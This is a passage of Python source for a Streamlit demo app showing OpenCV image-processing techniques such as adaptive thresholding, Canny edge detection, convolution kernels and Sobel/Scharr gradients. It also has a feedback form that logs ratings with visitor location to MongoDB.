st.markdown('A simple app that shows different image processing techniques. You can choose the options from the dropdwon menu on the left.' +
'Technologies use to build the app:', unsafe_allow_html=True)
st.title('Technology Stack')
st.markdown('''
<p align="center">
<img src="https://img.shields.io/badge/Python-FFD43B?style=for-the-badge&logo=python&logoColor=blue" />
<img src="https://img.shields.io/badge/MongoDB-4EA94B?style=for-the-badge&logo=mongodb&logoColor=white" />
<img src="https://img.shields.io/badge/Streamlit-FF4B4B?style=for-the-badge&logo=Streamlit&logoColor=white" />
<img src="https://img.shields.io/badge/OpenCV-27338e?style=for-the-badge&logo=OpenCV&logoColor=white" />
<img src="https://img.shields.io/badge/Visual_Studio_Code-0078D4?style=for-the-badge&logo=visual%20studio%20code&logoColor=white" />
</p>''', unsafe_allow_html=True)
with cols[1]:
st.title('Image Processing Techniques')
st.markdown('''
>Morphological Operations --- OpenCV Morphological Operations
>
>Smoothing and Blurring --- OpenCV Smoothing and Blurring
>
>Color Spaces -- OpenCV Color Spaces (cv2.cvtColor)
>
>Basic Thresholding --- OpenCV Thresholding (cv2.threshold)
>
>Adaptive Thresholding --- Adaptive Thresholding with OpenCV (cv2.adaptiveThreshold)
>
>Kernels --- Convolutions with OpenCV and Python
>
>Image Gradients --- Image Gradients with OpenCV (Sobel and Scharr)
>
>Edge Detection --- OpenCV Edge Detection (cv2.Canny)
>
>Automatic Edge Detection --- Zero-parameter, automatic Canny edge detection with Python and OpenCV''', unsafe_allow_html=True)
st.title('Dedication')
st.markdown('''> To my Mother (Elsa), Paula, Cris, Maty and Sofia, To whom made this possible.
>
> Special thanks to Adrian from pyimagesearch.com for great tutorials of image processing, deep learning, augmented realty, etc. ''')
st.markdown('''> Long Live Rock N Roll.
>
> - "Well if I have to, I will die seven deaths just to lie In the arms of my eversleeping aim"''')
st.title('Contact')
st.markdown('''<p align="center">
<a href="mailto:jjaramillo34@gmail.com" rel="nofollow">
<img alt="Gmail" src="https://img.shields.io/badge/Gmail-D14836?style=for-the-badge&logo=gmail&logoColor=white"/>
</a>
<a href="https://github.com/jjaramillo34/" rel="nofollow">
<img alt="Github" src="https://img.shields.io/badge/GitHub-%2312100E.svg?&style=for-the-badge&logo=Github&logoColor=white"/>
</a>
<a href="https://twitter.com/jejaramilloc" rel="nofollow">
<img alt="Twitter" src="https://img.shields.io/badge/Twitter-1DA1F2?style=for-the-badge&logo=twitter&logoColor=white"/>
</a>
<a href="https://www.linkedin.com/in/javierjaramillo1/" rel="nofollow">
<img alt="Linkedin" src="https://img.shields.io/badge/LinkedIn-0077B5?style=for-the-badge&logo=linkedin&logoColor=white"/>
</a>
</p>''', unsafe_allow_html=True)
location_dict = get_location_data()
date_r = datetime.now()
city = location_dict['city']
ip = location_dict['ip']
region = location_dict['region']
country = location_dict['country']
loc = location_dict['loc']
with st.sidebar.form(key='columns_in_form',clear_on_submit=True): #set clear_on_submit=True so that the form will be reset/cleared once it's submitted
rating=st.slider("Please rate the app", min_value=1, max_value=5, value=3,help='Drag the slider to rate the app. This is a 1-5 rating scale where 5 is the highest rating')
feedback=st.text_input(label='Please leave your feedback here')
submitted = st.form_submit_button('Submit')
if submitted:
st.write('Thanks for your feedback!')
st.markdown('Your Rating:')
st.markdown(rating)
st.markdown('Your Feedback:')
st.markdown(feedback)
insert_data_mongodb(rating=rating, feedback=feedback, date_r=date_r, city=city, ip=ip, region=region, country=country, loc=loc)
score_average = average_ratings_mongodb()
if score_average == 5.0:
st.sidebar.title('App Ratings')
st.sidebar.markdown(f'⭐⭐⭐⭐⭐ <p style="font-weight:bold;color:green;font-size:20px;border-radius:2%;">{round(score_average, 1)}</p>', unsafe_allow_html=True)
elif score_average >=4.0 and score_average < 5.0:
st.sidebar.title('App Ratings')
st.sidebar.markdown(f'⭐⭐⭐⭐ <p style="font-weight:bold;color:green;font-size:20px;border-radius:2%;">{round(score_average, 1)}</p>', unsafe_allow_html=True)
elif score_average >=3.0 and score_average < 4.0:
st.sidebar.title('App Ratings')
st.sidebar.markdown(f'⭐⭐⭐ <p style="font-weight:bold;color:green;font-size:20px;border-radius:2%;">{round(score_average, 1)}</p>', unsafe_allow_html=True)
elif score_average >=2.0 and score_average < 3.0:
st.sidebar.title('App Ratings')
st.sidebar.markdown(f'⭐⭐ <p style="font-weight:bold;color:green;font-size:20px;border-radius:2%;">{round(score_average, 1)}</p>', unsafe_allow_html=True)
elif score_average < 2.0:
st.sidebar.title('App Ratings')
st.sidebar.markdown(f'⭐ <p style="font-weight:bold;color:green;font-size:20px;border-radius:2%;">{round(score_average, 1)}</p>', unsafe_allow_html=True)
st.sidebar.markdown(f'<p style="font-weight:bold;color:black;font-size:12px;border-radius:2%;">Ratings live atlas mongodb database feed</p>', unsafe_allow_html=True)
with st.expander('Show MongoDB Dashboard'):
components.iframe('https://charts.mongodb.com/charts-project-0-koqvp/public/dashboards/62523657-6131-48ab-8c6c-3893cfb849fa', height=800)
version()
def adaptive_thresholding():
st.header("Demo Adaptive Thresholding")
options = st.sidebar.radio('Adaptive Thresholding Options', ('Adaptive Thresholding', 'Adaptive Thesholding Interactive'))
if options == 'Adaptive Thresholding':
img_file = st.file_uploader(label='Upload a file', type=['png', 'jpg', 'jpge'], key='1')
if img_file is not None:
# load the image and display it
with st.expander('Show Original Image'):
image = load_image_PIL(img_file)
image = converted(image)
# convert the image to grayscale and blur it slightly
gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
blurred = cv.GaussianBlur(gray, (7, 7), 0)
st.image(image)
with st.expander('Show Adaptive Thresholding', expanded=True):
cols = st.columns(4)
(T, threshInv) = cv.threshold(blurred, 51, 255,
cv.THRESH_BINARY_INV)
cols[0].markdown("Simple Thresholding")
cols[0].image(threshInv)
with cols[0]:
download_button1(threshInv, button, download, mime_type, key='1.1')
# apply Otsu's automatic thresholding
(T, threshInv) = cv.threshold(blurred, 0, 255,
cv.THRESH_BINARY_INV | cv.THRESH_OTSU)
cols[1].markdown("Otsu Thresholding")
cols[1].image(threshInv)
with cols[1]:
download_button1(threshInv, button, download, mime_type, key='1.2')
# instead of manually specifying the threshold value, we can use adaptive thresholding to examine neighborhoods
# of pixels and adaptively threshold each neighborhood
thresh = cv.adaptiveThreshold(blurred, 255,
cv.ADAPTIVE_THRESH_MEAN_C, cv.THRESH_BINARY_INV, 21, 10)
cols[2].markdown("Mean Adaptive Thresholding")
cols[2].image(threshInv)
with cols[2]:
download_button1(thresh, button, download, mime_type, key='1.3')
# perform adaptive thresholding again, this time using a Gaussian weighting versus a simple mean to compute our
# local threshold value
thresh = cv.adaptiveThreshold(blurred, 255,
cv.ADAPTIVE_THRESH_GAUSSIAN_C, cv.THRESH_BINARY_INV, 21, 4)
cols[3].markdown("Gaussian Adaptive Thresholding")
cols[3].image(thresh)
with cols[3]:
download_button1(thresh, button, download, mime_type, key='1.4')
with st.expander("Show Adaptive Thresholding Types Interactive"):
x = st.slider('Change Threshold value', min_value = 50, max_value = 255, key='1')
ret,thresh1 = cv.threshold(blurred, x, 255, cv.THRESH_BINARY)
ret,thresh2 = cv.threshold(blurred, x, 255, cv.THRESH_BINARY_INV)
ret,thresh3 = cv.threshold(blurred, x, 255, cv.THRESH_TRUNC)
ret,thresh4 = cv.threshold(blurred, x, 255, cv.THRESH_TOZERO)
ret,thresh5 = cv.threshold(blurred, x, 255, cv.THRESH_TOZERO_INV)
titles = ['Original Image','BINARY','BINARY_INV','TRUNC','TOZERO','TOZERO_INV']
images = [blurred, thresh1, thresh2, thresh3, thresh4, thresh5]
cols = st.columns(3)
for i in range(0, 3):
cols[i].markdown(i)
cols[i].markdown(titles[i])
cols[i].image(images[i])
with cols[i]:
download_button1(images[i], button, download, mime_type, key='{i}.1.1')
cols = st.columns(3)
for i in range(3, 6):
cols[i-3].markdown(i)
cols[i-3].markdown(titles[i])
cols[i-3].image(images[i])
with cols[i- 3]:
download_button1(images[i], button, download, mime_type, key='{i}.2.2')
else:
# load the image and display it
with st.expander('Show Original Image'):
image = load_image('images/steve-jobs.jpg')
# convert the image to grayscale and blur it slightly
gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
blurred = cv.GaussianBlur(gray, (7, 7), 0)
st.image(image)
with st.expander('Show Adaptive Thresholding', expanded=True):
cols = st.columns(4)
(T, threshInv) = cv.threshold(blurred, 51, 255,
cv.THRESH_BINARY_INV)
cols[0].markdown("Simple Thresholding")
cols[0].image(threshInv)
with cols[0]:
download_button1(threshInv, button, download, mime_type, key='1.1')
# apply Otsu's automatic thresholding
(T, threshInv) = cv.threshold(blurred, 0, 255,
cv.THRESH_BINARY_INV | cv.THRESH_OTSU)
cols[1].markdown("Otsu Thresholding")
cols[1].image(threshInv)
with cols[1]:
download_button1(threshInv, button, download, mime_type, key='1.2')
# instead of manually specifying the threshold value, we can use adaptive thresholding to examine neighborhoods
# of pixels and adaptively threshold each neighborhood
thresh = cv.adaptiveThreshold(blurred, 255,
cv.ADAPTIVE_THRESH_MEAN_C, cv.THRESH_BINARY_INV, 21, 10)
cols[2].markdown("Mean Adaptive Thresholding")
cols[2].image(threshInv)
with cols[2]:
download_button1(thresh, button, download, mime_type, key='1.3')
# perform adaptive thresholding again, this time using a Gaussian weighting versus a simple mean to compute our
# local threshold value
thresh = cv.adaptiveThreshold(blurred, 255,
cv.ADAPTIVE_THRESH_GAUSSIAN_C, cv.THRESH_BINARY_INV, 21, 4)
cols[3].markdown("Gaussian Adaptive Thresholding")
cols[3].image(thresh)
with cols[3]:
download_button1(thresh, button, download, mime_type, key='1.4')
with st.expander("Show Adaptive Thresholding Types Interactive"):
x = st.slider('Change Threshold value', min_value = 50, max_value = 255, key='1')
ret,thresh1 = cv.threshold(blurred, x, 255, cv.THRESH_BINARY)
ret,thresh2 = cv.threshold(blurred, x, 255, cv.THRESH_BINARY_INV)
ret,thresh3 = cv.threshold(blurred, x, 255, cv.THRESH_TRUNC)
ret,thresh4 = cv.threshold(blurred, x, 255, cv.THRESH_TOZERO)
ret,thresh5 = cv.threshold(blurred, x, 255, cv.THRESH_TOZERO_INV)
titles = ['Original Image','BINARY','BINARY_INV','TRUNC','TOZERO','TOZERO_INV']
images = [blurred, thresh1, thresh2, thresh3, thresh4, thresh5]
cols = st.columns(3)
for i in range(0, 3):
cols[i].markdown(i)
cols[i].markdown(titles[i])
cols[i].image(images[i])
with cols[i]:
download_button1(images[i], button, download, mime_type, key='{i}.1.1')
cols = st.columns(3)
for i in range(3, 6):
cols[i-3].markdown(i)
cols[i-3].markdown(titles[i])
cols[i-3].image(images[i])
with cols[i- 3]:
download_button1(images[i], button, download, mime_type, key='{i}.2.2')
else:
img_file = st.file_uploader(label='Upload a file', type=['png', 'jpg', 'jpge'], key='1')
if img_file is not None:
with st.expander('Show Original Image'):
image = load_image_PIL(img_file)
image = converted(image)
# convert the image to grayscale and blur it slightly
gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
blurred = cv.GaussianBlur(gray, (7, 7), 0)
st.image(image)
with st.expander('Show Adaptive Thresholding Interactive', expanded=True):
cols = st.columns(4)
x = cols[0].slider('Change Threshold value', min_value = 50, max_value = 255, key='1')
(T, threshInv) = cv.threshold(blurred, x, 255,
cv.THRESH_BINARY_INV)
cols[0].markdown('Simple Thresholding')
cols[0].image(threshInv, use_column_width=True,clamp = True)
with cols[0]:
download_button1(threshInv, button, download, mime_type, key='1.1')
x = cols[1].slider('Change Threshold value', min_value = 50, max_value = 255, key='2', help='Auto threshold value selected')
# apply Otsu's automatic thresholding
(T, threshInv) = cv.threshold(blurred, 0, 255,
cv.THRESH_BINARY_INV | cv.THRESH_OTSU)
cols[1].markdown("Otsu's Automatic Thresholding")
cols[1].image(threshInv, use_column_width=True,clamp = True)
with cols[1]:
download_button1(threshInv, button, download, mime_type, key='1.2')
x = cols[2].slider('Change Threshold value', min_value = 21, max_value = 255, step = 2 ,key='3')
# instead of manually specifying the threshold value, we can use adaptive thresholding to examine neighborhoods
# of pixels and adaptively threshold each neighborhood
thresh = cv.adaptiveThreshold(blurred, 255,
cv.ADAPTIVE_THRESH_MEAN_C, cv.THRESH_BINARY_INV, x, 10)
cols[2].markdown('Mean Adaptive Thresholding')
cols[2].image(thresh, use_column_width=True,clamp = True)
with cols[2]:
download_button1(thresh, button, download, mime_type, key='1.3')
x = cols[3].slider('Change Threshold value', min_value = 21, max_value = 255, step = 2 ,key='4')
# perform adaptive thresholding again, this time using a Gaussian weighting versus a simple mean to compute our
# local threshold value
thresh = cv.adaptiveThreshold(blurred, 255,
cv.ADAPTIVE_THRESH_GAUSSIAN_C, cv.THRESH_BINARY_INV, x, 4)
cols[3].markdown('Gaussian Adaptive Thresholding')
cols[3].image(thresh, use_column_width=True,clamp = True)
cols[3].text("Bar Chart of the image")
with cols[3]:
download_button1(thresh, button, download, mime_type, key='1.4')
else:
with st.expander('Show Original Image'):
image = load_image('images/steve-jobs.jpg')
# convert the image to grayscale and blur it slightly
gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
blurred = cv.GaussianBlur(gray, (7, 7), 0)
st.image(image)
with st.expander('Show Adaptive Thresholding Interactive', expanded=True):
cols = st.columns(4)
x = cols[0].slider('Change Threshold value', min_value = 50, max_value = 255, key='1')
(T, threshInv) = cv.threshold(blurred, x, 255,
cv.THRESH_BINARY_INV)
cols[0].markdown('Simple Thresholding')
cols[0].image(threshInv, use_column_width=True,clamp = True)
with cols[0]:
download_button1(threshInv, button, download, mime_type, key='1.1')
x = cols[1].slider('Change Threshold value', min_value = 50, max_value = 255, key='2', disabled=True, help='Auto threshold value selected')
# apply Otsu's automatic thresholding
(T, threshInv) = cv.threshold(blurred, 0, 255,
cv.THRESH_BINARY_INV | cv.THRESH_OTSU)
cols[1].markdown("Otsu's Automatic Thresholding")
cols[1].image(threshInv, use_column_width=True,clamp = True)
with cols[1]:
download_button1(threshInv, button, download, mime_type, key='1.2')
x = cols[2].slider('Change Threshold value', min_value = 21, max_value = 255, step = 2 ,key='3')
# instead of manually specifying the threshold value, we can use adaptive thresholding to examine neighborhoods
# of pixels and adaptively threshold each neighborhood
thresh = cv.adaptiveThreshold(blurred, 255,
cv.ADAPTIVE_THRESH_MEAN_C, cv.THRESH_BINARY_INV, x, 10)
cols[2].markdown('Mean Adaptive Thresholding')
cols[2].image(thresh, use_column_width=True,clamp = True)
with cols[2]:
download_button1(thresh, button, download, mime_type, key='1.3')
x = cols[3].slider('Change Threshold value', min_value = 21, max_value = 255, step = 2 ,key='4')
# perform adaptive thresholding again, this time using a Gaussian weighting versus a simple mean to compute our
# local threshold value
thresh = cv.adaptiveThreshold(blurred, 255,
cv.ADAPTIVE_THRESH_GAUSSIAN_C, cv.THRESH_BINARY_INV, x, 4)
cols[3].markdown('Gaussian Adaptive Thresholding')
cols[3].image(thresh, use_column_width=True,clamp = True)
cols[3].text("Bar Chart of the image")
with cols[3]:
download_button1(thresh, button, download, mime_type, key='1.4')
source_code(
'Source Code + Adaptive Thresholding pyimagesearch.com',
'https://pyimagesearch.com/2021/05/12/adaptive-thresholding-with-opencv-cv2-adaptivethreshold/',
'https://gist.github.com/jjaramillo34/331a1aaeebeb4ff47d9b80a658643b60')
with st.expander('DuckDuckGo Search Results'):
st.subheader('More About Adaptive Thresholding')
#scrape_duckduckgo('adaptive thresholding opencv')
scrape_duckduckgo('adaptive thresholding opencv')
def auto_canny():
st.header("Auto Canny Demo")
realtime_update = st.sidebar.checkbox(label="Update in Real Time", value=True)
img_file = st.file_uploader(label='Upload a file', type=['png', 'jpg', 'jpeg'])
if img_file is not None:
# load the image, convert it to grayscale, and blur it slightly
image = load_image_PIL(img_file)
image = converted(image)
gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
blurred = cv.GaussianBlur(gray, (3, 3), 0)
# apply Canny edge detection using a wide threshold, tight threshold, and automatically determined threshold
wide = cv.Canny(blurred, 10, 200)
tight = cv.Canny(blurred, 225, 250)
auto = auto_canny_thresh(blurred)
images = [wide, tight, auto]
labels = ['Wide Edges', 'Tight Edges', 'Auto Canny']
# show the images
with st.expander('Show Original Image'):
st.markdown("Original")
st.image(image)
with st.expander('Show Auto Canny', expanded=True):
cols = st.columns(3)
for i, image in enumerate(images):
cols[i].markdown(labels[i])
cols[i].image(image)
with cols[i]:
download_button1(image, button, download, mime_type, key=f'{i}.1')
else:
# load the image, convert it to grayscale, and blur it slightly
image = load_image(default_image)
gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
blurred = cv.GaussianBlur(gray, (3, 3), 0)
# apply Canny edge detection using a wide threshold, tight
# threshold, and automatically determined threshold
wide = cv.Canny(blurred, 10, 200)
tight = cv.Canny(blurred, 225, 250)
auto = auto_canny_thresh(blurred)
images = [wide, tight, auto]
labels = ['Wide Edges', 'Tight Edges', 'Auto Canny']
# show the images
with st.expander('Show Original Image'):
st.markdown("Original")
st.image(image)
with st.expander('Show Auto Canny', expanded=True):
cols = st.columns(3)
for i, image in enumerate(images):
cols[i].markdown(labels[i])
cols[i].image(image)
with cols[i]:
download_button1(image, button, download, mime_type, key=f'{i}.1')
source_code(
'Source Code + Auto Canny pyimagesearch.com',
'https://pyimagesearch.com/2015/04/06/zero-parameter-automatic-canny-edge-detection-with-python-and-opencv/',
'https://gist.github.com/jjaramillo34/fb83acff62ce6502c398ba7133ab066c')
with st.expander('DuckDuckGo Search Results'):
st.subheader('More About Auto Canny')
scrape_duckduckgo('auto canny opencv')
def convolutions():
st.header("Resizing Demo")
img_file = st.file_uploader(label='Upload a file', type=['png', 'jpg', 'jpge'])
realtime_update = st.sidebar.checkbox(label="Update in Real Time", value=True)
if img_file is not None:
image = load_image_PIL(img_file)
image = converted(image)
else:
# construct average blurring kernels used to smooth an image
smallBlur = np.ones((7, 7), dtype="float") * (1.0 / (7 * 7))
largeBlur = np.ones((21, 21), dtype="float") * (1.0 / (21 * 21))
# construct a sharpening filter
sharpen = np.array((
[0, -1, 0],
[-1, 5, -1],
[0, -1, 0]), dtype="int")
# construct the Laplacian kernel used to detect edge-like regions of an image
laplacian = np.array((
[0, 1, 0],
[1, -4, 1],
[0, 1, 0]), dtype="int")
# construct the Sobel x-axis kernel
sobelX = np.array((
[-1, 0, 1],
[-2, 0, 2],
[-1, 0, 1]), dtype="int")
# construct the Sobel y-axis kernel
sobelY = np.array((
[-1, -2, -1],
[0, 0, 0],
[1, 2, 1]), dtype="int")
# construct the kernel bank, a list of kernels we're going to apply using both our
# custom `convole` function and OpenCV's `filter2D` function
kernelBank = (
("small_blur", smallBlur),
("large_blur", largeBlur),
("sharpen", sharpen),
("laplacian", laplacian),
("sobel_x", sobelX),
("sobel_y", sobelY)
)
# load the input image and convert it to grayscale
image = load_image('images/supermario.jpg')
gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
# loop over the kernels
with st.spinner('Creating Convolutions please wait for it...'):
for (kernelName, kernel) in kernelBank:
# apply the kernel to the grayscale image using both our custom 'convole'
# function and OpenCV's 'filter2D' function
st.write("[INFO] applying {} kernel".format(kernelName))
convoleOutput = convolve(gray, kernel)
opencvOutput = cv.filter2D(gray, -1, kernel)
# show the output images
col1, col2, col3 = st.columns(3)
with col1:
st.markdown("original")
st.image(gray)
with col2:
st.write("{} - convole".format(kernelName))
st.image(convoleOutput)
with col3:
st.write("{} - opencv".format(kernelName))
st.image(opencvOutput)
st.success('Convolutions were created succesfully!')
col1, col2 = st.columns(2)
with st.expander('Source Code'):
with col1:
st.markdown(code)
st.code('''
# construct average blurring kernels used to smooth an image
smallBlur = np.ones((7, 7), dtype="float") * (1.0 / (7 * 7))
largeBlur = np.ones((21, 21), dtype="float") * (1.0 / (21 * 21))
# construct a sharpening filter
sharpen = np.array((
[0, -1, 0],
[-1, 5, -1],
[0, -1, 0]), dtype="int")
# construct the Laplacian kernel used to detect edge-like regions of an image
laplacian = np.array((
[0, 1, 0],
[1, -4, 1],
[0, 1, 0]), dtype="int")
# construct the Sobel x-axis kernel
sobelX = np.array((
[-1, 0, 1],
[-2, 0, 2],
[-1, 0, 1]), dtype="int")
# construct the Sobel y-axis kernel
sobelY = np.array((
[-1, -2, -1],
[0, 0, 0],
[1, 2, 1]), dtype="int")
# construct the kernel bank, a list of kernels we're going to apply using both our
# custom `convole` function and OpenCV's `filter2D` function
kernelBank = (
("small_blur", smallBlur),
("large_blur", largeBlur),
("sharpen", sharpen),
("laplacian", laplacian),
("sobel_x", sobelX),
("sobel_y", sobelY)
)
# load the input image and convert it to grayscale
image = load_image('images/supermario.jpg')
gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
# loop over the kernels
with st.spinner('Creating Convolutions please wait for it...'):
for (kernelName, kernel) in kernelBank:
# apply the kernel to the grayscale image using both our custom 'convole'
# function and OpenCV's 'filter2D' function
st.write("[INFO] applying {} kernel".format(kernelName))
convoleOutput = convolve(gray, kernel)
opencvOutput = cv.filter2D(gray, -1, kernel)
# show the output images
col1, col2, col3 = st.columns(3)
with col1:
st.markdown("original")
st.image(gray)
with col2:
st.write("{} - convole".format(kernelName))
st.image(convoleOutput)
with col3:
st.write("{} - opencv".format(kernelName))
st.image(opencvOutput)''', language=language)
with col2:
st.markdown('Source Code Convole Function')
st.code('''
def convolve(image, kernel):
# grab the spatial dimensions of the image, along with
# the spatial dimensions of the kernel
(iH, iW) = image.shape[:2]
(kH, kW) = kernel.shape[:2]
# allocate memory for the output image, taking care to
# "pad" the borders of the input image so the spatial
# size (i.e., width and height) are not reduced
pad = (kW - 1) // 2
image = cv2.copyMakeBorder(image, pad, pad, pad, pad,
cv2.BORDER_REPLICATE)
output = np.zeros((iH, iW), dtype="float32")
# loop over the input image, "sliding" the kernel across
# each (x, y)-coordinate from left-to-right and top to
# bottom
for y in np.arange(pad, iH + pad):
for x in np.arange(pad, iW + pad):
# extract the ROI of the image by extracting the
# *center* region of the current (x, y)-coordinates
# dimensions
roi = image[y - pad:y + pad + 1, x - pad:x + pad + 1]
# perform the actual convolution by taking the
# element-wise multiplicate between the ROI and
# the kernel, then summing the matrix
k = (roi * kernel).sum()
# store the convolved value in the output (x,y)-
# coordinate of the output image
output[y - pad, x - pad] = k
# rescale the output image to be in the range [0, 255]
output = rescale_intensity(output, in_range=(0, 255))
output = (output * 255).astype("uint8")
# return the output image
return output''', language=language)
with st.expander('Convolutions with OpenCV and Python'):
# embed streamlit docs in a streamlit app
components.iframe("https://pyimagesearch.com/2016/07/25/convolutions-with-opencv-and-python/", height=800)
version()
def canny_edge_detector():
st.header("Canny Edge Detector Demo")
img_file = st.file_uploader(label='Upload a file', type=['png', 'jpg', 'jpge'], key='1')
realtime_update = st.sidebar.checkbox(label="Update in Real Time", value=True)
if img_file is not None:
image = load_image_PIL(img_file)
image = converted(image)
options = st.sidebar.radio('Canny Edge Detector Options', ('Canny Edge Detector', 'Canny Edge Detector Interactive'))
if options == 'Canny Edge Detector':
# load the image, convert it to grayscale, and blur it slightly
#image = load_image(default_image)
gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
blurred = cv.GaussianBlur(gray, (5, 5), 0)
col1, col2 = st.columns(2)
with col1:
with st.expander('Show Original Image'):
# show the original and blurred images
st.markdown("Original")
st.image(image)
with col2:
with st.expander('Show Blurred Image'):
st.markdown("Blurred")
st.image(blurred)
# compute a "wide", "mid-range", and "tight" threshold for the edges
# using the Canny edge detector
wide = cv.Canny(blurred, 10, 200)
mid = cv.Canny(blurred, 30, 150)
tight = cv.Canny(blurred, 240, 250)
col1, col2, col3 = st.columns(3)
# show the output Canny edge maps
with col1:
st.markdown("Wide Edge Map")
st.image(wide)
with col2:
st.markdown("Mid Edge Map")
st.image(mid)
with col3:
st.markdown("Tight Edge Map")
st.image(tight)
else:
image = load_image_PIL(img_file)
image = converted(image)
# load the image, convert it to grayscale, and blur it slightly
image = load_image(default_image)
gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
blurred = cv.GaussianBlur(gray, (5, 5), 0)
col1, col2 = st.columns(2)
with col1:
with st.expander('Show Original Image'):
# show the original and blurred images
st.markdown("Original")
st.image(image)
with col2:
with st.expander('Show Blurred Image'):
st.markdown("Blurred")
st.image(blurred)
# compute a "wide", "mid-range", and "tight" threshold for the edges
# using the Canny edge detector
col1, col2, col3 = st.columns(3)
# show the output Canny edge maps
with col1:
values = st.slider(
'Select a range of values',
10, 200, (10, 200), step=10)
wide = cv.Canny(blurred, values[0], values[1])
st.markdown("Wide Edge Map")
st.image(wide)
with col2:
values = st.slider(
'Select a range of values',
30, 150, (30, 150), step=5)
mid = cv.Canny(blurred, values[0], values[1])
st.markdown("Mid Edge Map")
st.image(mid)
with col3:
values = st.slider(
'Select a range of values',
200, 250, (200, 250))
tight = cv.Canny(blurred, values[0], values[1])
st.markdown("Tight Edge Map")
st.image(tight)
else:
options = st.sidebar.radio('Canny Edge Detector Options', ('Canny Edge Detector', 'Canny Edge Detector Interactive'))
if options == 'Canny Edge Detector':
# load the image, convert it to grayscale, and blur it slightly
image = load_image(default_image)
gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
blurred = cv.GaussianBlur(gray, (5, 5), 0)
col1, col2 = st.columns(2)
with col1:
with st.expander('Show Original Image'):
# show the original and blurred images
st.markdown("Original")
st.image(image)
with col2:
with st.expander('Show Blurred Image'):
st.markdown("Blurred")
st.image(blurred)
# compute a "wide", "mid-range", and "tight" threshold for the edges
# using the Canny edge detector
wide = cv.Canny(blurred, 10, 200)
mid = cv.Canny(blurred, 30, 150)
tight = cv.Canny(blurred, 240, 250)
col1, col2, col3 = st.columns(3)
# show the output Canny edge maps
with col1:
st.markdown("Wide Edge Map")
st.image(wide)
with col2:
st.markdown("Mid Edge Map")
st.image(mid)
with col3:
st.markdown("Tight Edge Map")
st.image(tight)
else:
# load the image, convert it to grayscale, and blur it slightly
image = load_image(default_image)
gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
blurred = cv.GaussianBlur(gray, (5, 5), 0)
col1, col2 = st.columns(2)
with col1:
with st.expander('Show Original Image'):
# show the original and blurred images
st.markdown("Original")
st.image(image)
with col2:
with st.expander('Show Blurred Image'):
st.markdown("Blurred")
st.image(blurred)
# compute a "wide", "mid-range", and "tight" threshold for the edges
# using the Canny edge detector
col1, col2, col3 = st.columns(3)
# show the output Canny edge maps
with col1:
values = st.slider(
'Select a range of values',
10, 200, (10, 200), step=10)
wide = cv.Canny(blurred, values[0], values[1])
st.markdown("Wide Edge Map")
st.image(wide)
with col2:
values = st.slider(
'Select a range of values',
30, 150, (30, 150), step=5)
mid = cv.Canny(blurred, values[0], values[1])
st.markdown("Mid Edge Map")
st.image(mid)
with col3:
values = st.slider(
'Select a range of values',
200, 250, (200, 250))
tight = cv.Canny(blurred, values[0], values[1])
st.markdown("Tight Edge Map")
st.image(tight)
def image_gradients():
st.header("Image Gradient Demo")
options = st.sidebar.radio('Image Gradient Options', ('Sobel/Scharr', 'Magnitude Orientation'))
if options == 'Sobel/Scharr':
img_file = st.file_uploader(label='Upload a file', type=['png', 'jpg', 'jpge'])
realtime_update = st.sidebar.checkbox(label="Update in Real Time", value=True)
if img_file is not None:
# load the image, convert it to grayscale, and display the original
# grayscale image
with st.expander('Show Sobel/Scharr Image Gradient', expanded=True):
image = load_image_PIL(img_file)
image = converted(image)
gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
# set the kernel size, depending on whether we are using the Sobel operator of the Scharr operator,
# then compute the gradients along the x and y axis, respectively
op = st.selectbox('Operators', ('sobel', 'scharr'))
if op == 'scharr':
s = 1
else:
s = 0
st.success(f'Operator Selected: {op}')
ksize = -1 if s > 0 else 3
gX = cv.Sobel(gray, ddepth=cv.CV_32F, dx=1, dy=0, ksize=ksize)
gY = cv.Sobel(gray, ddepth=cv.CV_32F, dx=0, dy=1, ksize=ksize)
# the gradient magnitude images are now of the floating point data type, so we need to take care
# to convert them back a to unsigned 8-bit integer representation so other OpenCV functions can
# operate on them and visualize them
gX = cv.convertScaleAbs(gX)
gY = cv.convertScaleAbs(gY)
# combine the gradient representations into a single image
combined = cv.addWeighted(gX, 0.5, gY, 0.5, 0)
# show our output images
cols = st.columns(4)
cols[0].markdown("Gray")
cols[0].image(gray)
cols[1].markdown("Sobel/Scharr X")
cols[1].image(gX)
with cols[1]:
download_button1(gX, button, download, mime_type, key='1.1')
cols[2].markdown("Sobel/Scharr Y")
cols[2].image(gY)
with cols[2]:
download_button1(gY, button, download, mime_type, key='1.2')
cols[3].markdown("Sobel/Scharr Combined")
cols[3].image(combined)
with cols[3]:
download_button1(combined, button, download, mime_type, key='1.3')
else:
# load the image, convert it to grayscale, and display the original
# grayscale image
with st.expander('Show Sobel/Scharr Image Gradient', expanded=True):
image = load_image(default_image)
gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
# set the kernel size, depending on whether we are using the Sobel operator of the Scharr operator,
# then compute the gradients along the x and y axis, respectively
op = st.selectbox('Operators', ('sobel', 'scharr'))
if op == 'scharr':
s = 1
else:
s = 0
st.success(f'Operator Selected: {op}')
ksize = -1 if s > 0 else 3
gX = cv.Sobel(gray, ddepth=cv.CV_32F, dx=1, dy=0, ksize=ksize)
gY = cv.Sobel(gray, ddepth=cv.CV_32F, dx=0, dy=1, ksize=ksize)
# the gradient magnitude images are now of the floating point data type, so we need to take care
# to convert them back a to unsigned 8-bit integer representation so other OpenCV functions can
# operate on them and visualize them
gX = cv.convertScaleAbs(gX)
gY = cv.convertScaleAbs(gY)
# combine the gradient representations into a single image
combined = cv.addWeighted(gX, 0.5, gY, 0.5, 0)
# show our output images
cols = st.columns(4)
cols[0].markdown("Gray")
cols[0].image(gray)
cols[1].markdown("Sobel/Scharr X")
cols[1].image(gX)
with cols[1]:
download_button1(gX, button, download, mime_type, key='2.1')
cols[2].markdown("Sobel/Scharr Y")
